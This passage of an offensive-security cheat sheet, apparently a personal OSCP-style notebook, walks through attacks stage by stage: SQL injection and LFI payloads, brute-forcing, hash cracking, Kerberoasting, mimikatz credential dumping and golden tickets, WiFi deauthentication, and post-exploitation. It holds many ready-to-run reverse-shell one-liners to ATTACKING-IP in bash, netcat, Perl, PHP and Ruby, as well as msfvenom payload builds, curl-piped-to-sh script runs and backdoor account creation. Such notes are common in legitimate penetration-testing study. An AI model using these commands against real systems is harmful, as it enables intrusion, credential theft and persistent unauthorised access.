DB ```powershell #if we found a flat-file db file EXAMPLE.db #if sqlite3 sqlite3 <database-name> .tables PRAGMA table_info(customers); SELECT * FROM customers; ``` - sqlmap - check website for sql injection (more info down) [Sqlmap trick](https://hackertarget.com/sqlmap-post-request-injection/) - if we have a login page, we can try admin:admin, catch that in burpsuite, save the full request to a file, run: ```bash sqlmap -r FILENAME --level=5 --risk=3 --batch sqlmap -r FILENAME -dbs --level=5 --risk=3 --batch sqlmap -r FILENAME --dbs #enumarate DB's sqlmap -r FILENAME -D DB_Name --tables #enumarate tables sqlmap -r FILENAME -D DB_Name -T TABLE_Name --dump #DUMP table #Find SQL in webpage url automatically sqlmap -u https://IP/ –crawl=1 #with authentication sqlmap -u “http://target_server” -s-data=param1=value1&param2=value2 -p param1--auth-type=basic --auth-cred=username:password #Get A Reverse Shell (MySQL) sqlmap -r post_request.txt --dbms "mysql" --os-shell ``` - [fimap](https://github.com/kurobeats/fimap) - Check for LFI, find, prepare, audit, exploit and even google automatically for local and remote file inclusion ```bash ~/tools/fimap/src/fimap.py –H –u http://target-site.com/ -w output.txt ``` If we see in burpsuite php$url= we need to test for LFI (try /etc/passwrd) ```bash http://$ip/index.php?page=/etc/passwd http://$ip/index.php?file=../../../../etc/passwd ``` ## if a page redirects to another, we can use burp to stop ```bash Proxy -> Options -> Match and Replace ``` ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled.png) ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%201.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%201.png) ## kerberos (88): ```powershell tel#add host to /etc/hosts sudo gedit /etc/hosts ./GetUserSPNs.py -request active.htb/SVC_TGS > admin.txt #the password we will get will be encrypted john admin.txt --wordlist=/usr/share/wordlists/rockyou.txt #with the cracked password... psexec.py [email protected] ``` ## **Pop3 (110):** ```bash telnet INSERTIPADDRESS 110 ``` ```bash USER [username] ``` ```bash PASS [password] ``` - To login ```bash LIST ``` - To list messages ```bash RETR [message number] ``` - Retrieve message ```bash QUIT ``` ```bash quits ``` ## RPC (135) ```bash rpcclient --user="" --command=enumprivs -N $ip #Connect to an RPC share without a username and password and enumerate privledges rpcclient --user="<Username>" --command=enumprivs $ip #Connect to an RPC share with a username and enumerate privledges ``` ## **RPCBind (111):** ```bash rpcinfo –p x.x.x.x ``` ## **SMB\RPC Enumeration (139/445):** ```bash smbmap -H 10.10.10.149 ``` ```bash smbclient -L \\\\10.0.0.100\\ smbclient \\\\10.0.0.100\\Replication prompt off #doesnt prompt of us downloading recurse on` #download all the files mget *` #download all files in this share ``` ```bash enum4linux -a 10.0.0.1 #Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing ``` ```bash nbtscan x.x.x.x #Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain ``` ```bash ridenum.py 192.168.XXX.XXX 500 50000 dict.txt ``` ```bash python /home/hasamba/tools/impacket/build/scripts-3.8/samrdump.py 192.168.XXX.XXX ``` ```bash nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse $IP ``` smb4k on Kali, useful Linux GUI for browsing SMB shares ```bash apt-get install smb4k -y ``` - on Windows: - Download All Files From A Directory Recursively ```bash smbclient '\\server\share' -N -c 'prompt OFF;recurse ON;cd 'path\to\directory\';lcd '~/path/to/download/to/';mget *' ``` ```bash net use \\TARGET\IPC$ "" /u:"" #Manual Null session testing ``` ## **SNMP Enumeration (161):** - Fix SNMP output values so they are human readable: ```bash apt-get install snmp-mibs-downloader download-mibs echo "" > /etc/snmp/snmp.conf ``` ```bash snmpwalk -c public -v1 192.168.1.X 1| grep hrSWRunName|cut -d* * -f ``` ```bash snmpcheck -t 192.168.1.X -c public ``` ```bash onesixtyone -c names -i hosts ``` ```bash nmap -sT -p 161 192.168.X.X -oG snmp_results.txt nmap -n -vv -sV -sU -Pn -p 161,162 –script=snmp-processes,snmp-netstat IP ``` ```bash snmpenum -t 192.168.1.X ``` ```bash onesixtyone -c names -i hosts ``` ```bash #metasploit auxiliary/scanner/snmp/snmp_enum auxiliary/scanner/snmp/snmp_enum_hp_laserjet auxiliary/scanner/snmp/snmp_enumshares auxiliary/scanner/snmp/snmp_enumusers auxiliary/scanner/snmp/snmp_login ``` ## **Oracle (1521):** ```bash tnscmd10g version -h INSERTIPADDRESS ``` ```bash tnscmd10g status -h INSERTIPADDRESS ``` ## LDAP (389) [JXplorer - an open source LDAP browser](http://jxplorer.org/) ## MSSQL (1433) ```bash nmap -n -v -sV -Pn -p 1433 –script ms-sql-brute –script-args userdb=users.txt,passdb=passwords.txt IP nmap -n -v -sV -Pn -p 1433 –script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password IP ``` [Hunting for MSSQL | Offensive Security](https://www.offensive-security.com/metasploit-unleashed/hunting-mssql/) ## **Mysql Enumeration (3306):** ```bash nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 mysql –h IP -u root -p show databases; show tables; use tablename; describe table; select table1, table2 from tablename; ``` ## Active Directory ```bash # current domain info [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() # domain trusts ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() # current forest info [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() # get forest trust relationships ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships() # get DCs of a domain nltest /dclist:offense.local net group "domain controllers" /domain # get DC for currently authenticated session nltest /dsgetdc:offense.local # get domain trusts from cmd shell nltest /domain_trusts # get user info nltest /user:"spotless" # get DC for currently authenticated session set l # get domain name and DC the user authenticated to klist # get all logon sessions. Includes NTLM authenticated sessions klist sessions # kerberos tickets for the session klist # cached krbtgt klist tgt # whoami on older Windows systems set u # find DFS shares with ADModule Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name # find DFS shares with ADSI $s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name} # check if spooler service is running on a host powershell ls "\\dc01\pipe\spoolss" ``` ## MSSQL Try using "Browse for More" via MS SQL Server Management Studio Enumeration / Discovery: Nmap: ```bash nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 ``` Metasploit: ```bash msf > use auxiliary/scanner/mssql/mssql_ping ``` ### Bruteforce MSSQL Login ```bash msf > use auxiliary/admin/mssql/mssql_enum ``` ### Metasploit MSSQL Shell ```bash msf > use exploit/windows/mssql/mssql_payload msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp ``` # Gaining Access - hydra: bruteforce tool ```bash hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.0.0.101 -t 4 -v -f #-l is the user we want to attack, -P password file list, -t threads, -v verbose #it's better to intercept the login page with burp, check to see the correct username&password syntax and copy the exact failed message -#f exit when a login/pass pair is found hydra -l hasamba -P ~/Desktop/test_passwords.txt 10.0.0.210 -s 8085 http-post-form "/login/:username=^USER^&password=^PASS^:F=Authentication failed" -VVV -t 6 - hydra OPT #will show us optional moduls for http and such hydra -U MODULE_NAME #will show module examples hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V #Hydra FTP brute force hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V #Hydra POP3 brute force hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V #Hydra SMTP brute force hydra -l username -P password-list <URL_TO_SERVER> http-post-form "<PATH-TO_LOGIN>:POST_REQUEST_FOR_LOGIN:FAILED_RESPONSE_IDENTIFIER" ``` - metasploit - can also bruteforce ```bash use auxialary/scanner/ssh/ssh_login options set username root set pass_file /usr/share... set rhosts set threads 10 set verbose true run ``` - unshadow (kali) - combine both files and will insert the hashed passwords to the passwd file, so we can use this file with hashcat to maybe decrypt the password. ```bash unshadow PASSSWD_FILE SHADOW_FILE ``` - [hashcat](https://www.notion.so/Hashcat-b885f8ac8c0f450986d62c0d29f44cb9) - crack passwords hashes ([Cheat Sheet](https://s3.us-west-2.amazonaws.com/secure.notion-static.com/a44ab748-a9a9-437e-a4a1-2fa1cc6c03a8/HashcatCheatSheet.v2018.1b.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAT73L2G45O3KS52Y5%2F20201122%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20201122T190235Z&X-Amz-Expires=86400&X-Amz-Signature=03753b73d70b97901e6a764011ae5ffdbffc2d9dcbd00673f79b64097b1299d9&X-Amz-SignedHeaders=host&response-content-disposition=filename%20%3D%22HashcatCheatSheet.v2018.1b.pdf%22)) ```bash hashcat -m "OSCODE" unshadow.txt passwordFile.txt #from here: https://github.com/frizb/Hashcat-Cheatsheet hashcat --force -m300 --status -w3 -o found.txt --remove --potfile-disable -r rules\OneRuleToRuleThemAll.rule hash.txt rockyou.txt ``` - hash-identifier ```bash hash-identifier [hash] ``` - [name-that-hash](https://github.com/HashPals/Name-That-Hash) - better hash analyzer ```jsx ``` - cewl - create wordlist from a website ```bash cewl -v --with-numbers -e --email_file cewl_email.wordlist -w cewl.wordlist http://sneakycorp.htbme #my favorite rule to add: john --wordlist=wordlist.txt --rules=jumbo --stdout > wordlist-modified.txt hashcat --force cewl.wordlist -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words https://github.com/praetorian-inc/Hob0Rules ###hob064 This ruleset contains 64 of the most frequent password patterns hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/rockyou.txt -r hob064.rule -o cracked.txt ###d3adhob0 This ruleset is much more extensive and utilizes many common password structure ideas hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/english.txt -r d3adhob0.rule -o cracked.txt #adding John rules john --wordlist=wordlist.txt --rules --stdout > wordlist-modified.txt john --wordlist=wordlist.txt --rules=best64 --stdout > wordlist-modified.txt ``` - john the ripper - password cracker ([cheat sheet](https://drive.google.com/viewerng/viewer?url=https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf)) ([Jumbo community version](https://github.com/openwall/john)) ```bash john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt #after john finished, ask him to show john hashes.txt --show john 127.0.0.1.pwdump --wordlist=dictionary.txt --rules=Jumbo #with jumbo rules from https://github.com/openwall/john ``` [CyberChef](https://gchq.github.io/CyberChef/) [CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.](https://crackstation.net/) [Hash Analyzer](https://www.tunnelsup.com/hash-analyzer/) [Cipher Identifier (online tool) | Boxentriq](https://www.boxentriq.com/code-breaking/cipher-identifier) - msfvenom(kali) - tool to create malware ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOSTS=10.10.10.14 LPORT=4444 -f aspx > ex.aspx msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war ``` - [responder (imapcket)](https://www.notion.so/responder-imapcket-b7bdbbb91ce74e98834dd88ec1715528) - MITM - listening in the background and wait for a failed dns request ```bash responder -I eth0 -rdwv #Run Responder.py for the length of the engagement while you're working on other attack vectors. ``` # Post Exploitation ## Useful commands running locally on the Linux system To quickly analyze the system and possibly help to escalate privileges - whoami - shows the user we logged in with - history - show last history, it usually can show any password or personal stuff the user execute - sudo -l - show what programs we can run without sudo, check all process against [GTFOBins](https://gtfobins.github.io/) - if we get `(ALL, !root) /bin/bash`, we can exploit with [this](https://www.exploit-db.com/exploits/47502) - uname -a - will show us the linux version so we can search for a script that will escalate privileges - export - check system variables - processes ```bash ps -ef ps auxf ps auxfww ``` - find in files ```bash find . -name "*.java" -type f -exec fgrep -iHn "textToFind" {} \; find . -regex ".*\.\(c\|java\)" -type f -exec fgrep -iHn "textToFind" {} \; find / -maxdepth 4 -name *.conf -type f -exec grep -Hn "textToFind" {} \; 2>/dev/null # SUID files owned by root find / -uid 0 -perm -4000 -type f 2>/dev/null # SUID files owned by root and world readable find / -uid 0 -perm -u=s,o=r -type f -exec ls -la {} \; 2> /dev/null # SUID files find / -perm -4000 -type f 2>/dev/null # world writable directories find / -perm -2 -type d 2>/dev/null #find passwords in files and ignore errors and filter out the proc and other folders find . ! -path "*/proc/*" -type f -name "*" -exec fgrep -iHn password {} \; find . -type f \( -iname \*.conf -o -iname \*.cfg -o -iname \*.xml -o -iname \*.ini -o -iname \*.json -o -iname \*.sh -o -iname \*.pl -o -iname \*.py \) -exec fgrep -iHn password {} \; 2> /dev/null # find using several patterns read from file (patterns are delimited by new line) find . -type f -exec grep -iHFf patterns.txt {} \; # find password keyword in small files find . -type f -size -512k -exec fgrep -iHn password {} \; # reverse java jar files and find passwords there find . -name "*.jar" -type f -exec ~/jd-cli/jd-cli -oc -l -n -st {} \; | egrep -i -e "Location:" -e "password" | uniq ``` ```bash # check open ports and services listening netstat -anp # check defined hosts cat /etc/hosts # check local IP addresses and interfaces ifconfig -a # check route route -v # check filesystem df # check sudo privileges sudo -l # check crontab crontab -l # check inittab cat /etc/inittab # try to sniff traffic tcpdump tcpdump -s0 not port 22 -w trace.pcap # check known hosts cat ~/.ssh/known_hosts # try access mails head /var/mail/root # list groups, users cat /etc/group cat /etc/passwd # with root privileges cat /etc/shadow # check shared memory ipcs -mp # logout logout # close script session Ctrl + D ``` ## Scripts - [pwncat](https://github.com/calebstewart/pwncat) - pwncat is a post-exploitation platform for Linux targets ```bash cd ~/tools source pwncat-env/bin/activate # Connect to a bind sheql pwncat connect://10.10.10.10:4444 pwncat 10.10.10.10:4444 pwncat 10.10.10.10 4444 # Listen for reverse shell pwncat bind://0.0.0.0:4444 pwncat 0.0.0.0:4444 pwncat :4444 pwncat -lp 4444 # Connect via ssh pwncat ssh://user:[email protected] pwncat [email protected] pwncat user:[email protected] pwncat -i id_rsa [email protected] # SSH w/ non-standard port pwncat -p 2222 [email protected] pwncat [email protected]:2222 # Reconnect utilizing installed persistence # If reconnection failes and no protocol is specified, # SSH is used as a fallback. pwncat reconnect://[email protected] pwncat reconnect://user@c228fc49e515628a0c13bdc4759a12bf pwncat [email protected] pwncat c228fc49e515628a0c13bdc4759a12bf pwncat 10.10.10.10 ^D run enumerate.gather run escalate.auto exec ---OLD--- upload/download --help persist --help persist --install perist --status persist --clean tamper --help busybox --install enum --help enum --show --type sudo enum --report enumaration.md privsec --help privsec -l privsec --escalate privsec -e -u sysadmin ``` - [sherlock](https://github.com/rasta-mouse/Sherlock) - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. - [windows exploit suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins. - metasploit migrate process and search suggester ```bash ps migrate 1788 search suggester ``` - [psexec](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/psexec%20d818d32588314cb68f8ca3db57a6e1ef.md), wmiexec.py or [smbexec.py](http://smbexec.py) - privilege escalation for windows - [powershellempire](https://github.com/PowerShellEmpire/PowerTools) - windows privilege escalation ```bash powershell -ep (ExecutionPolicy) bypass . .\PowerView.ps1 Get-NetDomain Get-NetDomainController Get-DomainPolicy (Get-DomainPolicy)."system access" Get-NetUser Get-NetUser | select cn /samaccountname/description Get-UserProperty -Properties pwdlastset/logoncount/badpwdcount Get-NetComputer -FullData(extra data) | select(like grep) OperatingSystem Get-NetGroupMember -GroupName "Domain Admins" Invoke-ShareFinder Get-NetGPO | select displayname, whenchanged ``` - [bloodhound](https://github.com/BloodHoundAD/BloodHound) - easily identify highly complex attack paths - crackmapexec - can take passwords or hashes that we found and check them against all computers on a network ```powershell crackmapexec 192.168.57.0/24 -u fcastle -d MARVEL.local -p Password1 #Spray the network with local login credentials then dump SAM contents crackmapexec smb 10.0.0.1/24 -u administrator -p 'password' --local-auth --sam #Pass the hash network-wide, local login, dump LSA contents crackmapexec smb 10.0.0.1/24 -u administrator -H <hash> --local-auth --lsa ``` - [secretsdump.py](http://secretsdump.py) (impacket) - dumps hashes for known user/password ```powershell secretsdump.py marvel/fcastle:[email protected] ``` - [incognito (meterpeter)](https://www.notion.so/incognito-meterpeter-881379ef297d4b3f8b50745428e1e8ed) - can impersonate a user - [GetUserSPNs.py](http://getuserspns.py) (impacket) ```bash GetUserSpns.py marvel.local/fcastle:Password1 -dc-ip 192.168.57.140 -request ``` - [mimikatz](https://github.com/gentilkiwi/mimikatz) - can extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets ```bash mimikatz privilege::debug` (allow us to bypass several protections) sekurlsa::logonpasswords` show us all users login from reboot, we can pass the hash or crack them, we can search for `wdigest` until windows8 including windows7 the passoword stored in plain text, from windows8 microsoft turned it off, we can turn it on from mimikatz and wait for a user to login lsadump::sam` dumps the SAM lsadump::lsa /patch` dumps Local Security Authority lsadump::lsa /inject /name:krbtgt` kerberos::golden /User:Administrator(doesnt matter, can be fake) /domain:marvel.local /sid:SID /krbtgt:NTLM /id:500(your RID) /ptt(pass the ticket to our next session)` misc::command` (gives us command prompt with full privilege) ``` # Privilige Escalation ([alot of resources](https://github.com/coreb1t/awesome-pentest-cheat-sheets#privilege-escalation)) [Linux privilege escalation](https://jok3rsecurity.wordpress.com/linux-privilege-escalation/) [Linux Privilege Escalation CheatSheet for OSCP - ByteFellow](https://www.bytefellow.com/linux-privilege-escalation-cheatsheet-for-oscp/) [windows privilege escalation](https://jok3rsecurity.wordpress.com/windows-privilege-escalation/) [Windows Privilege Escalation Cheatsheet for OSCP - ByteFellow](https://www.bytefellow.com/windows-privilege-escalation-cheatsheet-for-oscp/) [C0nd4/OSCP-Priv-Esc](https://github.com/C0nd4/OSCP-Priv-Esc) ## **Linux:** Find Binaries that will execute as the owner ```bash find / -perm -u=s -type f 2>/dev/null ``` Find binaries that will execute as the group ```bash find / -perm -g=s -type f 2>/dev/null ``` Find sticky-bit binaries ```bash find / -perm -1000 -type d 2>/dev/null ``` If Python is executable as root ```bash python2.7 -c "import pty;pty.spawn('/bin/sh');" ``` - [LinPeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) - Linux Privilege Escalation Awesome Script ```bash #From github curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh #Local network sudo python -m SimpleHTTPServer 80 curl 10.10.10.10/linpeas.sh | sh #Without curl sudo nc -q 5 -lvnp 80 < linpeas.sh cat < /dev/tcp/10.10.10.10/80 | sh #Output to file linpeas -a > /dev/shm/linpeas.txt less -r /dev/shm/linpeas.txt #Read with colors ``` - [LinEnum](https://github.com/rebootuser/LinEnum) ```bash ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t #-k Enter keyword #-e Enter export location #-t Include thorough (lengthy) tests #-s Supply current user password to check sudo perms (INSECURE) #-r Enter report name #-h Displays this help text ``` [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) [https://github.com/pentestmonkey/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) ## **Windows:** ```powershell #after getting a low privilege shell systeminfo #copy the result to systeminfo.txt python2 ~/tools/Windows-Exploit-Suggester/windows-exploit-suggester.py --update python2 ~/tools/Windows-Exploit-Suggester/windows-exploit-suggester.py --systeminfo systeminfo.txt --database [DB].xls ``` [https://github.com/pentestmonkey/windows-prive](https://github.com/pentestmonkey/windows-privesc-check) [sc-check](https://github.com/pentestmonkey/windows-privesc-check) [http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) [https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/](https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/) # Maintain Access - metasploit ```bash persistence -h OR exploit/windows/local/persistence OR net user hacker password123 /add ``` # Wireless Penetration - airmon-ng, airodump-ng, aircrack-ng - crack wifi networks ```bash iwconfig #show wireless cards, check after connecting the wireless card to the vm machine in options airmon-ng check kill #will kill process that intruppt airmon-ng start wlan0 #starts monitor mode on the card iwconfig #will assure that we are in monitor mode airodump-ng wlan0mon #check for avaliable networks, PWR show the closer network, the smallest number is the closest airodump-ng -c 6 --bssid MAC -w capture wlan0mon #will capture data from the specific MAC address of the network we want, 6 is the channel number of the network #we are waiting to capture the handshake, it will written in the header #we can make it faster by DEAUTH which means kicking a connected user and while he re-auth we will capture the handshake #in a new terminal: aireplay-ng -0 1 -a MAC_OF_THE_NETWORK -c MAC_OF_THE_STATION_CONNECTED wlan0mon ls capture* aircrack-ng -w wordlist.txt -b MAC_OF_THE_NETWORK CAPTUREFILE #could be done also with hashcat #phone numbers are very common as a password ``` # **Shells & Reverse Shells** ## **SUID C Shells** - bin/bash: ``` int main(void){ setresuid(0, 0, 0); system("/bin/bash"); } ``` - bin/sh: ``` int main(void){ setresuid(0, 0, 0); system("/bin/sh"); } ``` ### **TTY Shell:** ```bash python -c 'import pty;pty.spawn("/bin/bash")' #Python TTY Shell Trick ``` ```bash echo os.system('/bin/bash') ``` ```bash /bin/sh –i #Spawn Interactive sh shell ``` ```bash execute('/bin/sh') ``` - LUA ```bash !sh ``` - Privilege Escalation via nmap ```bash :!bash ``` - Privilege escalation via vi ### Fully Interactive TTY ``` In reverse shell python -c 'import pty; pty.spawn("/bin/bash")' Ctrl-Z In Attacker console stty -a stty raw -echo fg In reverse shell reset export SHELL=bash export TERM=xterm-256color stty rows <num> columns <cols> ``` ### **Spawn Ruby Shell** ```bash exec "/bin/sh" ``` ```bash ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d ``` ### **Netcat** ```bash nc -e /bin/sh ATTACKING-IP 80 ``` ```bash /bin/sh | nc ATTACKING-IP 80 ``` ```bash rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p ``` ### **Telnet Reverse Shell** ```bash rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p ``` ```bash telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443 ``` ### **PHP** ```bash php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");' ``` - (Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6) ### **Bash** ```bash exec /bin/bash 0&0 2>&0 ``` ```bash 0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196 ``` ```bash exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done ``` ```bash # or: while read line 0<&5; do $line 2>&5 >&5; done ``` ```bash bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 ``` ### **Perl** ```bash exec "/bin/sh"; ``` ```bash perl —e 'exec "/bin/sh";' ``` ```bash perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` ```bash perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` - Windows ```bash perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` - # Meterpreter (Metasploit) ([cheet sheet](https://www.tunnelsup.com/metasploit-cheat-sheet/)) ### **Windows reverse meterpreter payload** ```bash set payload windows/meterpreter/reverse_tcp ``` - Windows reverse tcp payload ### **Windows VNC Meterpreter payload** ```bash set payload windows/vncinject/reverse_tcpf ``` - Meterpreter Windows VNC Payload ```bash set ViewOnly false ``` ### **Linux Reverse Meterpreter payload** ```bash set payload linux/meterpreter/reverse_tcp ``` - Meterpreter Linux Reverse Payload ### **Meterpreter Cheat Sheet** ```bash upload file c:\\windows ``` - Meterpreter upload file to Windows target ```bash download c:\\windows\\repair\\sam /tmp ``` - Meterpreter download file from Windows target ```bash download c:\\windows\\repair\\sam /tmp ``` - Meterpreter download file from Windows target ```bash execute -f c:\\windows\temp\exploit.exe ``` - Meterpreter run .exe on target – handy for executing uploaded exploits ```bash execute -f cmd -c ``` - Creates new channel with cmd shell ```bash ps ``` - Meterpreter show processes ```bash shell ``` - Meterpreter get shell on the target ```bash getsystem ``` - Meterpreter attempts priviledge escalation the target ```bash hashdump ``` - Meterpreter attempts to dump the hashes on the target (must have privileges; try migrating to winlogon.exe if possible first) ```bash portfwd add –l 3389 –p 3389 –r target ``` - Meterpreter create port forward to target machine ```bash portfwd delete –l 3389 –p 3389 –r target ``` - Meterpreter delete port forward ```bash use exploit/windows/local/bypassuac ``` - Bypass UAC on Windows 7 + Set target + arch, x86/64 ```bash use auxiliary/scanner/http/dir_scanner ``` - Metasploit HTTP directory scanner ```bash use auxiliary/scanner/http/jboss_vulnscan ``` - Metasploit JBOSS vulnerability scanner ```bash use auxiliary/scanner/mssql/mssql_login ``` - Metasploit MSSQL Credential Scanner ```bash use auxiliary/scanner/mysql/mysql_version ``` - Metasploit MSSQL Version Scanner ```bash use auxiliary/scanner/oracle/oracle_login ``` - Metasploit Oracle Login Module ```bash use exploit/multi/script/web_delivery ``` - Metasploit powershell payload delivery module ```bash post/windows/manage/powershell/exec_powershell ``` - Metasploit upload and run powershell script through a session ```bash use exploit/multi/http/jboss_maindeployer ``` - Metasploit JBOSS deploy ```bash use exploit/windows/mssql/mssql_payload ``` - Metasploit MSSQL payload ```bash run post/windows/gather/win_privs ``` - Metasploit show privileges of current user ```bash use post/windows/gather/credentials/gpp ``` - Metasploit grab GPP saved passwords ```bash load kiwi ``` ```bash creds_all ``` - Metasploit load Mimikatz/kiwi and get creds ```bash run post/windows/gather/local_admin_search_enum ``` - Idenitfy other machines that the supplied domain user has administrative access to ```bash set AUTORUNSCRIPT post/windows/manage/migrate ``` ### **Meterpreter Payloads** ```bash msfvenom –l ``` - List options ### **Binaries** ```bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf ``` ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe ``` ```bash msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho ``` ### **Web Payloads** ```bash msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php ``` - PHP ```bash set payload php/meterpreter/reverse_tcp ``` - Listener ```bash cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php ``` - PHP ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp ``` - ASP ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp ``` - JSP ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war ``` - WAR ### **Scripting Payloads** ```bash msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py ``` - Python ```bash msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh ``` - Bash ```bash msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl ``` - Perl ### **Shellcode** For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. ```bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f ``` ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f ``` ```bash msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f ``` ### **Handlers** Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. ``` exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z ``` An example is: ``` msfvenom exploit/multi/handler -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f > exploit.extension ``` # **Powershell** **Execution Bypass** ```bash Set-ExecutionPolicy Unrestricted ./file.ps1 ``` ```bash Import-Module script.psm1 Invoke-FunctionThatIsIntheModule ``` ```bash iex(new-object system.net.webclient).downloadstring(“file:///C:\examplefile.ps1”) ``` **Powershell.exe blocked** ```bash Use ‘not powershell’ [https://github.com/Ben0xA/nps](https://github.com/Ben0xA/nps) ``` **Persistence** ```bash net user username 